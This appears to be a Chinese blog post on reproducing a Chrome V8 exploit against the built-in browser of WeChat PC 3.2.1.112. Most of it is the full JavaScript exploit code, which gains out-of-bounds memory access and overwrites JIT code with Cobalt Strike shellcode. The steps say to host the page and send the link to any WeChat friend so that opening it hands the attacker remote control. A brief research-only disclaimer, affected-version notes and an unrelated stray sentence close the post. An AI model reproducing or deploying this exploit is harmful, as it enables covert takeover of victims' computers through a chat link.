复现微信内置浏览器Chrome漏洞实现远控

发布于 2021-09-22  418 次阅读


环境:微信PC版本3.2.1.112利用步骤:

1.使用CobaltStrike生成一个x86格式的shellcode。

2.建立一个测试网站,并且将下方的0day poc放入。

ENABLE_LOG = true;
IN_WORKER = true;
var shellcode = [shellcode];
function print(data) {}var not_optimised_out = 0;
var target_function = (function (value) {if (value == 0xdecaf0) {not_optimised_out += 1;

}
not_optimised_out += 1;
not_optimised_out |= 0xff;not_optimised_out *= 12;});
for (var i = 0; i < 0x10000; ++i) {target_function(i);
}
var g_array;var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;
function cb(flag) {if (flag == true) {return;
}
g_array = new Array(0);
g_array[0] = 0x1dbabe * 2;
return 'c01db33f';
}function gc() {for (var i = 0; i < 0x10000; ++i) {new String();
}}function oobAccess() {var this_ = this;this.buffer = null;
this.buffer_view = null;
this.page_buffer = null;this.page_view = null;
this.prevent_opt = [];var
kSlotOffset = 0x1f;
var kBackingStoreOffset = 0xf;class LeakArrayBuffer extends ArrayBuffer {constructor() {super(0x1000);this.slot = this;
}}this.page_buffer = new LeakArrayBuffer();
this.page_view = new DataView(this.page_buffer);
new RegExp({ toString: function () { return 'a' } });cb(true);class DerivedBase extends RegExp {constructor() {super({toString: cb}, 'g');this_.buffer = new ArrayBuffer(0x80);
g_array[8] = this_.page_buffer;
}}var derived_n = eval(`(function derived_n(i) {if (i == 0) {return DerivedBase;
}class DerivedN extends derived_n(i-1) {constructor() {super();return;${"this.a=0;
".repeat(tDerivedNCount)}}}return DerivedN;})`);
gc();new (derived_n(tDerivedNDepth))();this.buffer_view = new DataView(this.buffer);
 this.leakPtr = function (obj) {this.page_buffer.slot = obj;return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
}this.setPtr = function (addr) {this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
}this.read32 = function (addr) {this.setPtr(addr);
return this.page_view.getUint32(0, true, ...this.prevent_opt);}this.write32 = function (addr, value) {this.setPtr(addr);
this.page_view.setUint32(0, value, true, ...this.prevent_opt);}this.write8 = function (addr, value) {this.setPtr(addr);
this.page_view.setUint8(0, value, ...this.prevent_opt);
}this.setBytes = function (addr, content) {for (var i = 0; i < content.length; i++) {this.write8(addr + i, content[i]);
}}return this;}function trigger() {var oob = oobAccess();
var func_ptr = oob.leakPtr(target_function);print('[*] target_function at 0x' + func_ptr.toString(16));var kCodeInsOffset = 0x1b;
var code_addr = oob.read32(func_ptr + kCodeInsOffset);
print('[*] code_addr at 0x' + code_addr.toString(16));oob.setBytes(code_addr, shellcode);
target_function(0);}try{print("start running");
trigger();}catch(e){print(e);}End...

3.微信发送给任意好友,在pc端用内置浏览器打开url即可成功上线。

4.使用CobaltStrike工具即可实现远控等一系列操作

漏洞原因:内置微信浏览器为QQ浏览器,使用chrome内核,关闭沙盒。注意:微信在关闭web shell时会掉线问题,可以通过进程迁移解决。影响范围:微信PC版:3.2.1.141及以下版本使用 chrome 内核 89.0.4389.114 及以下的浏览器(edge、360 浏览器、google chrome、谷歌浏览器等)预防措施:将微信升级到3.2.1.141及以上版本,不要点击陌生链接。截至发稿日期:2021.4.17,微信内核最新版本尚未更新,仍可使用其他方法绕过,实现远程控制!

本文提供的poc仅供技术研究使用,请勿非法使用。


公交车司机终于在众人的指责中将座位让给了老太太